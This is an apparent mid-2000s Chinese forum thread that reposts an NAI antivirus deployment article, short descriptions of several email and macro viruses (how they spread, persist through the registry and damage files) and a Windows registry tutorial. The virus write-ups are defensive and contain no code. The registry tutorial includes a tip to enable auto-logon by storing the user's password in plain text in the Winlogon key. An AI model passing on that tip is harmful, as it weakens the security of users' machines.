  一个好的防病毒系统应该能够覆盖到每一种需要的平台。我们都知道,病毒的入口点是非常多的。在一个具有多个网络入口的连接点的企业网络环境中,病毒可以由软盘、光盘等传统介质进入,也可能由电子邮件、网络服务器等进入,还有可能从外部网络中通过文件传输等方式进入。病毒可能的入口点如图1所示。

  在图1中标出的入口点处,任何一点没有部署防病毒系统,对整个网络都是一个安全的威胁。比如一个木桶由很多块木板拼成,该木桶的容量就取决于最矮的那块木板的长度,而不是最高的。所以,我们一般需要考虑在每一种需要防护的平台上都部署防病毒软件。它大体上分为以下几类平台:客户端、邮件服务器、其他服务器、网关。

  以NAI为例,它针对邮件服务器和群件服务器以及网关防病毒,提供了Groupshield和Webshield两种解决方案。其中Groupshield是基于Microsoft Exchange 和 Lotus Notes 群件服务器的防病毒保护解决方案。同Netshield 一样,GroupShield 提供了强大的管理功能,控制所有文件、应用程序并执行远程服务、安装与配置。强大的集中警告功能可以通过电子邮件、打印机、寻呼机、DMI警告或网络消息,传送各种病毒警告给携带病毒邮件的寄件人、收件人和系统管理员。而对于基于SMTP的邮件服务器,NAI提供了Webshield SMTP防病毒系统,它可以形成一个病毒过滤前置机,完全能够适用于任何类型的SMTP邮件服务器,而不管该服务器采用何种操作系统和邮件服务器版本。而且,用户可以针对邮件的标题以及正文设置内容过滤策略,杜绝不正当信息的流通。

  注意二,软件控制台功能要完善
  为了方便集中管理,防病毒软件控制台首先需要解决的就是管理容量问题。也就是每一台控制台能够管理到的客户机的最大数目。另外,对于一个企业内部的不同部门,我们有可能需要设置不同的防病毒策略,比如一些关键的业务部门服务器和计算机,我们需要每当有新的病毒特征码就尽快升级;但是对于一些非关键业务部门的计算机,我们可以考虑时间稍长再升级一次;对于白天比较繁忙的服务器,我们可以将病毒特征码升级安排在晚上自动进行。一个好的控制台应该允许管理员按照IP地址、计算机名称、子网甚至NT域进行安全策略的分别实施。

  在这方面NAI有两种控制台可供使用:一种称为ePO ( ePolicy Orchestrator),是一种大规模、企业级的防病毒控制台;另外一种称为ME (Management Edition),是一种适合在小规模网络中使用的控制台。两种控制台都能够进行防病毒软件的分发和升级,用户可以根据需要选用两种产品。

  注意三,通过广域网管理的流量要尽量少
  在一个需要通过广域网进行管理的企业中,由于广域网的带宽有限,防病毒软件的安装和升级流量问题也是必须要考虑到的。NAI的做法是:首先,自动升级功能允许升级发生在非工作时间,尽量不占用业务需要的带宽;其次, 利用AVD瘦客户端技术产品VirusScan TC,它专用于部署在大型企业中的客户机上的产品,大小仅有传统防病毒软件的三分之一;另外,对于必须频繁升级的特征码,NAI AVD采用了一种增量升级方式的选项,将传统的1M以上的特征码压缩到了100K左右。

  注意四,报表功能要方便易用
  一个网络中的病毒活动状况对于网络管理员来说是非常重要的,通过了解网络中的病毒活动情况,网络管理员可以了解哪些病毒活动比较频繁、哪些计算机或者用户的文件比较容易感染病毒以及发现的病毒的清除情况等等,以便修改病毒防范策略以及了解病毒的来源情况,方便进行用户、文件资源的安全管理。实用、界面友好的报表是一个网络防病毒软件必备的功能。如图2所示。

  注意五,对计算机病毒要有实时防范能力
  传统意义上的实时计算机病毒防范是指防病毒软件能够常驻内存,对所有活动的文件进行病毒扫描和清除。由于病毒活动频繁,再加上网络管理员一般都工作忙碌,有可能会导致病毒特征码不能及时更新。这就需要防病毒软件本身能够具有一定程度的未知病毒识别能力,一旦防病毒软件发现一个文件可能携带病毒,它应该有能力提供一种解决方法对该文件进行处理,以免系统或者文件受到未知病毒的破坏。另外,病毒一般都经常存在一个爆发期,比如2000年元旦,在这个爆发期内,计算机病毒防范系统应该能够依据具体情况自动进行报警、策略修改或者更新特征码等工作,以免影响进一步扩大。

  NAI AVD具有一种自动免疫的功能,启用该功能后,防病毒软件就可以对未知病毒进行判断,并且如果怀疑某个文件携带病毒,它就会自动提取病毒样本,发送给NAI设立在全球各地的病毒研究小组,并且如果小组确认是病毒的话,就会马上作出响应。

  此外,NAI AVD还具有防止病毒爆发引起损失的功能,叫做Outbreak管理器。该管理器可以运行在邮件防病毒系统和网关防病毒系统上。管理员可以预先定义策略,如当在10分钟内发现100个美丽莎病毒在网上传播,就采取特定行动,如给管理员发送呼机或电子邮件告警;再过10分钟又发现100个该病毒,则采取进一步行动如更改扫描频率,启动自定义扫描对关键文件进行检查;再进一步可以完成更新病毒特征码等工作,如果病毒爆发发生在预定义的非工作时间,该管理器甚至可以暂时停止邮件的转发,阻止病毒的蔓延。如图3所示。

  注意六,病毒特征码升级要快速及时
  反病毒软件如果没有即时升级就达不到进行病毒防范的目的。所以,能够提供一个方便、有效和快速的升级方式是防病毒系统应该具备的重要功能之一。NAI的防病毒特征码的升级一般每星期一到两次,在病毒多发期甚至能够达到每5分钟更新一次特征码。如此频繁的更新如果让每一个用户手动进行是不现实的,AVD 提供了几种不同的升级方式:

  1. 用户自定义升级策略,让软件到指定时间后自动到Internet或本地文件服务器进行特征码更新。

  2. 管理员在控制台发出强制升级指令,对一个或多个防病毒管理组中的计算机进行统一升级。

  3. 升级特征码在网络上共享,由用户分别升级。

  在一个大型的企业中,由于管理员工作繁忙,可能无法经常上网检查防病毒软件的更新情况,从而有可能无法及时得到升级信息。对此,NAI提供了一种工具和服务,叫做SecureCast,管理员可以利用该服务一天24小时自动地从NAI服务站点上得到最新的软件版本更新和特征码更新信息,包括自动下载需要更新的特征码文件。这一切都不需要管理员的任何手工干预!如果配合ePO的自动分发功能,管理员甚至无须动手就可以完成即时升级工作。

  注意七,研发能力和技术支持力量要强
  NAI公司是全球最大的专业从事网络安全的厂商,其防病毒产品具有雄厚的用户基础和市场份额。它具有一个分布全球近20个国家的反病毒紧急响应小组(AVERT),可以快速对病毒事件进行响应。不管病毒在何时何地爆发,NAI总能够提供最新的病毒信息和处理方案。

  综上所述,目前的防病毒工作的意义早已脱离了各自为战的状况,技术也不仅仅局限在单机的防病毒。目前,如果需要对整个网络进行规范化的网络病毒防范,我们就必须了解最新的技术,结合网络的病毒入口点分析,很好地将这些技术应用到自己的网络中去,形成一个协同作战、统一管理的局面。这样的病毒防范体系,才能够称得上是一个完整的、现代化的网络病毒防御体系。


计算机病毒小知识速查系列十八

看似淫秽漫画,实是爱虫病毒变种

      一种“爱虫”病毒的新变形于本周二开始四处传播。这种病毒名叫“MyBabyPic”,看上去非常像一个通过电子邮件转发来的淫秽漫画。
  这种病毒仍然是通过电子邮件传播(只能通过Outlook传播),附件是一个采用Visual Basic语言编写的可执行文件——MyBabyPic.EXE。邮件的主题栏写着“My baby pic !!!”,邮件的正文是“Its my animated baby picture !!”。

  如果接收者打开附件,将会看到一张婴儿的动画图片。这个还睡在婴儿床中的婴儿却长有一个成年人尺寸大小的阴茎,而且,动画效果还会使阴茎出现在两个不同的方位。这张图片可能会鼓励接收者将其转发给其他互联网用户,就好像传播一个淫秽漫画一样。

  但实际上,如果打开了附件,这种病毒就会在本地的文件系统中进行自我复制,并在大约10分钟后向Outlook地址簿上的每一个地址发出一封电子邮件。这种病毒还会生成一组文件,并加入到Windows系统注册表的启动部分,每当被感染的电脑启动一次,它就会自动执行一次。

  据称,这种病毒拥有非常危险的有效载荷,能轻易删除被感染电脑上的数据。根据目前的时间和日期,它还可以激活/关闭键盘上的NumLock,CapLock和ScrollLock键;可以向键盘缓冲发出“.IM_BESIDES_YOU_”信息,并发送不同的文本信息。

  此外,这种病毒还可以破坏以VBS,VBE,JS,JSE,CSS,WSH,SCT,HTA,PBL,CPP,PAS,C,H,JPG,JPEG,MP2和MP3等为扩展名的文件。


计算机病毒小知识速查系列十九

在线聊天当心“萨利姆”病毒

  最近一个通过映射驱动器和在线聊天系统传播的“萨利姆”(W97M/Salim.A)病毒被冠群金辰的全球病毒监测网发现。据了解,W97M/Salim.A是一个宏病毒和通过在线聊天系统传播的蠕虫,除了在ThisDocument模块中写入病毒代码外,它也在传播过程中截取文档内容。

  “萨利姆”蠕虫依靠文档事件处理程序来运行,当一个已感染的文档被打开时,宏病毒就被激活,当染毒文档被关闭时,病毒的Document_Close宏将开始运行。与其它宏病毒不同,它并不使'宏病毒保护选项'失效,因此宏报警仍将显示。它在通用模板中执行一个'am I here'的检查,比较它的ThisDocument中第一行代码是否匹配'PIJAVICA;如果不匹配,所有在通用模板的ThisDocument对象中的原代码将被删除,病毒的原代码将从目前文档插入目标对象。

  之后,“萨利姆”病毒将尝试感染当前被Word打开的所有文档。然而,这种尝试将由于一个错误而失败。病毒将在C盘根目录生成文件Salim_se.doc和Win32Drv.doc,这两个文件是带有宏病毒代码的激活文档的两个复制文件。这两个文件含有激活文档的内容,能将敏感信息暴露给不被期望的浏览者。Salim_se.doc的一个副本也会在每个映射驱动器生成。

  如果在一个已感染的系统中存在目录"C:\MIRC",Script.ini文件将被创造或被覆盖,以使C:\Salim_se.doc能通过在线聊天系统送出。


计算机病毒小知识速查系列二十

手机病毒欲乘Java强势而来

  日前在东京举行的电脑病毒国际会议“AVAR 2000”上,多位专家都对于“手机病毒”发出了警告,虽然目前还没有关于手机感染病毒的报告。不过,据说今后随着在手机中附加Java功能的增多,将有可能出现手机病毒。  

  在举行会议的第2天,由AVAR成员、Symantec的SARC经理星泽裕二做了有关移动式终端--尤其是手机病毒的讲演。  

  目前,手机还不能执行由用户等编写的程序。因此还没有手机病毒。今年6月份有人提出过关于与手机有关联的病毒“TIMOFONICA”的病毒报告。不过,该病毒只是向手机发送电子邮件的病毒,只能在个人电脑上感染及发作。然而,据说伴随着配备Java功能的i模式手机的登场,情况将会发生很大的变化。  

  芬兰的F-Secure的反病毒研究经理Mikko Hypponen也发出类似的警告。  

  “目前已经出现了在PDA上运行的病毒。这就是在9月份发现的Palm病毒‘Phase'。如果手机功能越来越多,同样也会出现手机病毒。我曾经听说某个制作病毒的集团宣布要制造手机病毒的消息”。  

  “如果手机可以执行程序的话,肯定能够制造出在该平台上运行的病毒。但是也不能因此就'不给手机追加功能'。对于用户来说,没有什么比提高功能更为重要的了”。



计算机病毒小知识速查系列二十一

病毒佯披Flash外衣

      趋势科技12月1日发布一级病毒警讯,一只名为”TROJ_SHOCKWAVE.A"的新病毒,1日凌晨透过电子邮件大量散播,并在美国传出数起感染灾情。该病毒属于特洛依木马型(Trojan)病毒,以夹带着”CREATIVE.EXE"档案的电子邮件进行散播(如图一),使用者中毒后,病毒会将自己寄给使用者Outlook通讯录里的所有名单,自动对这些邮件地址发送垃圾邮件。信件主旨为:”AgreatShockwaveflashmovie",信件内容“CheckouthisnewflashmoviethatIdownloadjustnow...It'sGreat."。

      该病毒最特殊之处,在于以Flash档来吸引电脑使用者开启,趋势科技技术支援部经理林锦忠强调:「近年来,愈来愈多的电子贺卡、卡通、游戏及广告改以Flash来表现,网友间分享动画档的情况也相当普遍。这就成为TROJ_SHOCKWAVE.A病毒作者所期待希望多媒体迷会在无意开启病毒附带档。」 趋势科技呼电脑使用者收到以上信件主旨或夹带着”CREATIVE.EXE"档案的电子邮件,请直接删除,不要开启。趋势科技美国分公司已接获数起客户感染报告,该公司表示,TROJ_SHOCKWAVE.A病毒已在外散播(inthewild),趋势科技产品可侦测该病毒。

      趋势科技eDoctor病毒实验室分析,当使用者收到带有病毒的电子邮件,在不知情的状况下执行该附带档,电脑随即中毒。病毒会将自己寄给使用者Outlook通讯录里所有的名单,自动对这些邮件地址发送垃圾邮件,同时夹带病毒档案CREATIVE.EXE。病毒会寻找使用者硬碟中所有*.JPG,*.ZIP档案,将其移往C:\root资料夹,更改档案附档名,增加下列文字“changeatleastnowtoLINUX",例如:XXXX.ZIP变成“XXXX.ZIPchangeatleastnowtoLINUX"。病毒会在C:根目录下加入messageforu.txt文字档,纪录所有被搬移档案的原始位置。
鱼溺水而亡,是为了让大海能够记住他~
34楼
编辑   |    引用    回帖
关闭    高亮    置顶   |    移动    回收站   |    -6删帖    删帖    |   
82622206

田鼠

中级会员

将军

贴子 1814

精华 3

积分 1061

信用 0

竞猜 0

魅力 188

威望 0

现金 70 CZB

银行 0 CZB

黄金 0

比特币 0

注册时间 2005-06-01

发表于:2005-12-05 15:12:54   |  只看该作者   |  转账至  82622206

注册表从入门到精通

注册表对有的人还是比较陌生的,因为现在第三方软件太多了,如优化大师、魔法兔子等等,但个人觉得改善系统的第三方软件还不够完善,如果初级用户使用不当,会出现严重的后果,所以提供这篇文章,希望大家多多学习,本人能力有限,还希望大家多提宝贵意见:

  一、注册表的由来

  PC机及其操作系统的一个特点就是允许用户按照自己的要求对计算机系统的硬件和软件进行各种各样的配置。早期的图形操作系统,如Win3.x中,对软硬件工作环境的配置是通过对扩展名为.ini的文件进行修改来完成的,但INI文件管理起来很不方便,因为每种设备或应用程序都得有自己的INI文件,并且在网络上难以实现远程访问。   

  为了克服上述这些问题,在Windows 95及其后继版本中,采用了一种叫做“注册表”的数据库来统一进行管理,将各种信息资源集中起来并存储各种配置信息。按照这一原则,Windows各版本中都采用了将应用程序和计算机系统全部配置信息容纳在一起的注册表,用来管理应用程序和文件的关联、硬件设备说明、状态属性以及各种状态信息和数据等。   

  与INI文件不同的是:

  1.注册表采用了二进制形式登录数据;

  2.注册表支持子键,各级子关键字都有自己的“键值”;

  3.注册表中的键值项可以包含可执行代码,而不是简单的字串;

  4.在同一台计算机上,注册表可以存储多个用户的特性。   

  注册表的特点有:

  1.注册表允许对硬件、系统参数、应用程序和设备驱动程序进行跟踪配置,这使得修改某些设置后不用重新启动成为可能。

  2.注册表中登录的硬件部分数据可以支持高版本Windows的即插即用特性。当Windows检测到机器上的新设备时,就把有关数据保存到注册表中,另外,还可以避免新设备与原有设备之间的资源冲突。

  3.管理人员和用户通过注册表可以在网络上检查系统的配置和设置,使得远程管理得以实现。


二、使用注册表

  1.大家可以在开始菜单中的运行里输入regedit

  2.也可以在DOS下输入regedit

  三、注册表根键说明

  hkey_classes_root 包含注册的所有OLE信息和文档类型,是从 hkey_local_machine\software\classes复制的。

  hkey_current_user 包含登录的用户配置信息,是从hkey_users\当前用户子树复制的。

  hkey_local_machine 包含本机的配置信息。其中config子树是显示器打印机信息; enum子树是即插即用设备信息;system子树是设备驱动程序和服务参数的控制集合;software子树是应用程序专用设置。

  hkey_users 所有登录用户信息。

  hkey_current_config 包含常被用户改变的部分硬件软件配置,如字体设置、显示器类型、打印机设置等。是从hkey_local_machine\config复制的。

  hkey_dyn_data 包含现在计算机内存中保存的系统信息。

  四、注册表详细内容

    Hkey_local_machine\software\microsoft\windows\currentVersion\explorer\user shell folders 保存个人文件夹、收藏夹的路径

    Hkey_local_machine\system\currentControlSet\control\keyboard Layouts保存键盘使用的语言以及各种中文输入法

  Hkey_users\.Default\software\microsoft\internet explorer\typeURLs保存IE浏览器地址栏中输入的URL地址列表信息。清除文档菜单时将被清空。

    Hkey_users\.Default\so..\mi..\wi..\currentVersion\ex..\menuOrder\startMenu 保留程序菜单排序信息

  Hkey_users\.Default\so..\microsoft\windows\currentVersion\explorer\RunMRU 保存“开始 * 运行...“中运行的程序列表信息。清除文档菜单时将被清空。

    Hkey_users\.Default\so..\microsoft\windows\currentVersion\explorer\ecentDocs 保存最近使用的十五个文档的快捷方式(删除掉可解决文档名称重复的毛病),清除文档菜单时将被清空。

    Hkey_local_machine\software\microsoft\windows\currentVersion\uninstall 保存已安装的Windows应用程序卸载信息。

  hkey_users\.default\software\microsoft\windows\currentVersion\applets 保存Windows应用程序的纪录数据。

  Hkey_local_machine\system\CurrentControlSet\services\class 保存控制面板-增添硬件设备-设备类型目录。

    Hkey_local_machine\system\CurrentControlSet\control\update 立即刷新设置。值为00设置为自动刷新,01设置为手工刷新[在资源管理器中按F5刷新]。

  HKEY_CURRENT_USER\Control Panel\Desktop 新建串值名MenuShowDelay=0 可使“开始”菜单中子菜单的弹出速度提高。新建串值名MinAnimate,值为1启动动画效果开关窗口,值为0取消动画效果。

    Hkey_local_machine\software\microsoft\windows\currentVersion\run 保存由控制面板设定的计算机启动时运行程序的名称,其图标显示在任务条右边。[启动文件夹程序运行时图标也在任务条右边]

  hkey_users\.default\software\microsoft\windows\currentVersion\run保存由用户设定的计算机启动时运行程序的名称,其图标显示在任务条右侧。

  HKEY_CLASS_ROOT/Paint.Pricture/DefaultIcon 默认图片的图标。双击窗口右侧的字符串,在打开的对话框中删除原来的键值,输入%1。重新启动后,在“我的电脑”中打开Windows目录,选择“大图标“,然后你看到的Bmp文件的图标再也不是千篇一律的画板图标了,而是每个Bmp文件的略图。

    Hkey-local-machine\ software\ microsoft\ windows\ currentVersion\ Policies\ Ratings 保存IE4.0中文版“安全”*“分级审查”中设置的口令(数据加密)。

    Hkey-local-machine\ software\ microsoft\ windows\ currentVersion\ explorer\ desktop\nameSpace保存桌面中特殊的图标,如回收站、收件箱、MS Network等。


五、如何备份注册表

  利用注册表编辑器手工备份注册表

  注册表编辑器(Regedit)是操作系统自带的一款注册表工具,通过它就能对注册表进行各种修改。当然,"备份"与"恢复"注册表自然是它的本能了。   

  (1)通过注册表编辑器备份注册表

  由于修改注册表有时会危及系统的安全,因此不管是WINDOWS 98还是WINDOWS 2000甚至WINDOWS XP,都把注册表编辑器"藏"在了一个非常隐蔽的地方,要想"请"它出山,必须通过特殊的手段才行。点击"开始"菜单,选择菜单上的"运行"选项,在弹出的"运行"窗口中输入"Regedit"后,点击"确定"按钮,这样就启动了注册表编辑器。

  点击注册表编辑器的"注册表"菜单,再点击"导出注册表文件"选项,在弹出的对话框中输入文件名"regedit",将"保存类型"选为"注册表文件",再将"导出范围"设置为"全部",接下来选择文件存储位置,最后点击"保存"按钮,就可将系统的注册表保存到硬盘上。

  完成上述步骤后,找到刚才保存备份文件的那个文件夹,就会发现备份好的文件已经放在文件夹中了。   

  (2)在DOS下备份注册表

  当注册表损坏后,WINDOWS(包括"安全模式")无法进入,此时该怎么办呢?在纯DOS环境下进行注册表的备份、恢复是另外一种补救措施,下面来看看在DOS环境下,怎样来备份、恢复注册表。

  在纯DOS下通过注册表编辑器备份与恢复注册表前面已经讲解了利用注册表编辑器在WINDOWS环境下备份、恢复注册表,其实"Regedit.exe"这个注册表编辑器不仅能在WINDOWS环境中运行,也能在DOS下使用。

  虽然在DOS环境中的注册表编辑器的功能没有在WINDOWS环境中那么强大,但是也有它的独到之处。比如说通过注册表编辑器在WINDOWS中备份了注册表,可系统出了问题之后,无法进入WINDOWS,此时就可以在纯DOS下通过注册表编辑器来恢复注册表。

  应该说在DOS环境中备份注册表的情况还是不多见的,一般在WINDOWS中备份就行了,不过在一些特殊的情况下,这种方式就显得很实用了。

  进入DOS后,再进入C盘的WINDOWS目录,在该目录的提示符下输入"regedit"后按回车键,便能查看"regedit"的使用参数。

  通过"Regedit"备份注册表仍然需要用到"system.dat"和"user.dat"这两个文件,而该程序的具体命令格式是这样的:

  Regedit /L:system /R:user /E filename.reg Regpath

  参数含义:

  /L:system指定System.dat文件所在的路径。

  /R:user指定User.dat文件所在的路径。

  /E:此参数指定注册表编辑器要进行导出注册表操作,在此参数后面空一格,输入导出注册表的文件名。

  Regpath:用来指定要导出哪个注册表的分支,如果不指定,则将导出全部注册表分支。在这些参数中,"/L:system"和"/R:user"参数是可选项,如果不使用这两个参数,注册表编辑器则认为是对WINDOWS目录下的"system.dat"和"user.dat"文件进行操作。如果是通过从软盘启动并进入DOS,那么就必须使用"/L"和"/R"参数来指定"system.dat"和"user.dat"文件的具体路径,否则注册表编辑器将无法找到它们。

  比如说,如果通过启动盘进入DOS,则备份注册表的命令是"Regedit /L:C:\windows\/R:C:\windows\/e regedit.reg",该命令的意思是把整个注册表备份到WINDOWS目录下,其文件名为"regedit.reg"。而如果输入的是"regedit /E D:\regedit.reg"这条命令,则是说把整个注册表备份到D盘的根目录下(省略了"/L"和"/R"参数),其文件名为"Regedit.reg"。   

  (3)用注册表检查器备份注册表

  在DOS环境下的注册表检查器Scanreg.exe可以用来备份注册表。   

  命令格式为:

  Scanreg /backup /restore /comment   

  参数解释:

  /backup用来立即备份注册表

  /restore按照备份的时间以及日期显示所有的备份文件

  /comment在/restore中显示同备份文件有关的部分   

  注意:在显示备份的注册表文件时,压缩备份的文件以.CAB文件列出,CAB文件的后面单词是Started或者是NotStarted,Started表示这个文件能够成功启动Windows,是一个完好的备份文件,NotStarted表示文件没有被用来启动Windows,因此还不能够知道是否是一个完好备份。   

  比如:如果我们要查看所有的备份文件及同备份有关的部分,命令如下:Scanreg /restore /comment


六、使用技巧

  上面介绍的都是概念上的东东,下面让我们实际操作吧

  1.加快开机及关机速度

  在[开始]-->[运行]-->键入[Regedit]-->[HKEY_CURRENT_USER]-->[Control Panel]-->[Desktop],将字符串值[HungAppTimeout]的数值数据更改为[200],将字符串值[WaitToKillAppTimeout]的数值数据更改为1000.另外在[HKEY_LOCAL_MACHINE]-->[System]-->[CurrentControlSet]-->[Control],将字符串值[HungAppTimeout]的数值数据更改为[200],将字符串值[WaitToKillServiceTimeout]的数值数据更改1000   

  2.自动关闭停止响应程序

  在[开始]-->[运行]-->键入[Regedit]-->[HKEY_CURRENT_USER]-->[Control Panel]-->[Desktop],将字符串值[AutoEndTasks]的数值数据更改为1,重新启动即可   

  3.清除内存内被不使用的DLL文件

  在[开始]-->[运行]-->键入[Regedit]-->[HKKEY_LOCAL_MACHINE]-->[SOFTWARE]-->[Microsoft]-->[Windows]-->[CurrentVersion],在[Explorer]增加一个项[AlwaysUnloadDLL],默认值设为1。注:如由默认值设定为[0]则代表停用此功能   

  4.加快菜单显示速度

  在[开始]-->[运行]-->键入[Regedit]-->[HKEY_CURRENT_USER]-->[Control Panel]-->[Desktop],将字符串值[MenuShowDelay]的数值数据更改为[0],调整后如觉得菜单显示速度太快而不适应者可将[MenuShowDelay]的数值数据更改为[200],重新启动即可


5.禁止修改用户文件夹 

  找到HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer。如果要锁定“图片收藏”、“我的文档”、“收藏夹”、“我的音乐”这些用户文件夹的物理位置,分别把下面这些键设置成1:DisableMyPicturesDirChange,DisablePersonalDirChange,DisableFavoritesDirChange,DisableMyMusicDirChange   

  6.减小浏览局域网的延迟时间 

  和Windows 2000一样,XP在浏览局域网时也存在烦人的延迟问题,但介绍这个问题的资料却很难找到。如果你浏览一台Win 9x的机器,例如,在网上邻居的地址栏输入“\computername”,XP的机器会在它正在连接的机器上检查“任务计划”。这种搜索过程可能造成多达30秒的延迟。如果你直接打开某个共享资源,例如在网上邻居的地址栏输入“\computernameshare”,就不会有这个延迟过程。要想避免XP搜索“任务计划”的操作,提高浏览网络的速度,你可以删除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerRemoteComputerNameSpace{D6277990-4C6A-11CF-8D87-00AA0060F5BF}子键。该键的类型是REG_SZ   

  7.屏蔽系统中的热键  

  点击“开始”→“运行”,输入Regedit,打开注册表编辑器。然后依次打开到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,新建一个双字节值,键名为“NoWindows Keys”,键值为“1”,这样就可以禁止用户利用系统热键来执行一些禁用的命令。如果要恢复,只要将键值设为0或是将此键删除即可   

  8.关闭不用的共享  

  安全问题一直为大家所关注,为了自己的系统安全能够有保证,某些不必要的共享还是应该关闭的。用记事本编辑如下内容的注册表文件,保存为任意名字的.Reg文件,使用时双击即可关闭那些不必要的共享:  

  Windows Registry Editor Version 5.00  

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]  

  "AutoShareServer"=dword:00000000  

  "AutoSharewks"=dword:00000000  

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]  

  "restrictanonymous"=dword:00000001 


9.让IE支持多线程下载

  一般情况下,大家都使用多线程下载软件如Flashget等下载文件,其实IE也可以支持多线程下载的,只是微软将这个功能给藏了起来。我们把它给挖出来就可以使用了。打开注册表编辑器,在注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings下新建双字节值项“MaxConnectionsPerServer”,它决定了最大同步下载的连线数目,一般设定为5~8个连线数目比较好。另外,对于HTTP 1.0服务器,可以加入名为“MaxConnectionsPer1_0Server”的双字节值项,它也是用来设置最大同步下载的数目,也可以设定为5~8。    

  10.让WINDOWS XP自动登陆 

  打开:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,在右边的窗口中的新建字符串"AutoAdminlogon",并把他们的键值为"1",并且把“DefaultUserName”的值设置为用户名,并且另外新建一个字符串值“DefaultPassword”,并设其值为用户的密码

  七、我们来让我们的系统瘦瘦身

  删除多余的虚拟光驱图标

  当我们在系统中安装了虚拟光驱后,“我的电脑”中就会多出一个光盘图标,即便日后你不再使用虚拟光驱,虚拟光驱图标还会继续保留,实在没有必要。我们动手来删除这个多余的虚拟光驱图标:单击“开始→运行”,输入“regedit”,按下“确定”键后打开注册表编辑器,依次展开HKEY_LOCAL_MACHINE\Enum\SCSI分支,在SCSI子键下通常有两个子键,它们分别对应着虚拟光驱和物理光驱,把SCSI下的子键全部删除,重新启动电脑后虚拟光驱图标就会被删除。   

  删除多余的系统级图标

  系统级图标是指在安装Windows时由系统自动创建的图标,如回收站、收件箱、网上邻居等,其中有些图标对用户来说并无用处,但这些图标无法直接删除。打开注册表编辑器,依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\

  explorer\Desktop\NameSpace分支,然后删除不需要的子键。关闭注册表编辑器,重新启动电脑后,你会发现桌面上不需要的系统级图标已经消失了。



删除“运行”中多余的选项

  如果你多次使用“开始→运行”菜单,会发现它的“打开”窗口被一大堆不再需要的命令弄得凌乱不堪。打开注册表编辑器,依次展开HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion

  \Explorer\RunMRU分支,将右侧窗口的相关键值删除即可。   

  删除“查找”中多余的选项

  依次展开HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion

  \Explorer\Doc-FindSpecMRU分支,将右侧窗口中的相关键值删除即可。   

  删除多余的键盘布局

  Windows试图成为世界的宠儿,因此其键盘布局适合于各国各类人的使用习惯。打开注册表编辑器,依次展开HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control

  \KeyboardLayouts分支,我们可以看到该分支下保存了西班牙语(传统)、丹麦语、德语(标准)等多种键盘布局,如果你用不到这些语言的键盘布局,完全可以直接删除这些子键。   

  删除多余的区域设置

  与上述键盘布局相类似的还有Windows的区域设置,在注册表编辑器中展开HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control

  \Nls\Locale分支,简体中文使用者完全可以只保留“00000804”键值,其他可以毫不留情地删除。   

八、高级篇

  1、自动清除登录窗口中上次访问者的用户名

  通常情况下,用户在进入WINNT网络之前必须输入自己的用户名称以及口令。但是当你重新启动计算机,登录WINNT时,WINNT会在缺省情况下将上一次访问者的用户名自动显示在登录窗口的“用户名”文本框中。这样一来,有些非法用户可能利用现有的用户名来猜测其口令,一旦猜中的话,将会对整个计算机系统产生极大的安全隐患。为了保证系统不存在任何安全隐患,我们可以通过修改WINNT注册表的方法来也提供了启动时自动以某一个组的用户名称和口令进行访问WINNT,而不需要通过人工设置的方法来自动清除登录窗口中上次访问者的用户名信息。要实现自动清除功能,必须要进行如下配置:  A、在开始菜单栏中选择运行命令,在随后打开的运行对话框里输入REGEDIT命令,从而打开注册表编辑器。

  B、在打开的注册表编辑器中,依次展开以下的键值:  [HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON]

  C、在编辑器右边的列表框中,选择“DONTDISPLAYLASTUSERNAME”键值名称,如果没有上面的键值,可以利用“编辑”菜单中的“新建”键值命令添加一个,并选择所建数据类型为“REG_SZ”。

  D、选择指定的键值并双击,当出现“字符串编辑器”对话框时,在“字符串”文本框中输入“1”,其中“1”代表起用该功能,“0”代表禁止该功能。

  E、当用户重新启动计算机登录WINNT时,NT登录对话框中的“用户名”文本框中将是空白的。

  2、为一些非SCSI接口光驱进行手工配置

  如果你想在WINNT上安装一个非SCSI接口的光驱,在WINNT版本较高的计算机中这中类型的光驱可能被自动识别并自动由计算机来完成其安装任务,不巧的是,你的计算机中安装了一个低版本的操作系统,例如安装了WINNT3.5,还没有时间来升级,但现在就着急用光驱呢,那该怎么办才好呢?不急,虽然Windows NT3.5不能自动识别非SCSI接口的光驱,但我们可以通过手工安装的方式来帮你轻松搞定这个小问题,具体工作步骤为:

  A、首先必须将你手中的对应的非SCSI接口的CD-ROM驱动程序从安装盘拷贝到WINNT\SYSTEM32\DRIV ERS目录下。

  B、在WINNT主群组中打开Setup图标。

  C、从OPTION菜单中选择“Add/Remove SCSI Adapters”。  D、用鼠标单击ADD按钮,为你的非SCSI接口CD-ROM选择对应的驱动程序。

  E、接着单击“INSTALL”按钮进行一些相关参数的配置。  F、退出Windows NT,重新启动计算机后光驱就会有用了。

  3、增加NTFS性能

  如果用户想增加NTFS的性能,也可以通过修改注册表的方法来达到目的,具体实现步骤如下:

  A、打开注册表编辑器,并在编辑器中依次展开以下键值:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem

  B、在注册表编辑器中用鼠标单击“编辑”菜单,并在下拉菜单中选择“新建”菜单项,并在其弹出的子菜单中单击“DWORD值”。

  C、 在编辑器右边的列表中输入DWORD值的名称为“NtfsDisableLastAccessUpdate”。

  D、 接着用鼠标双击NtfsDisableLastAccessUpdate键值,编辑器就会弹出一个名为“字符串编辑器”的对话框,在该对话框的文本栏中输入数值“1”,其中0代表“取消”该项功能,1代表“启用”该项功能。

  E、设置好后,重新启动计算机就会使上述功能有效。

  4、修复镜像组

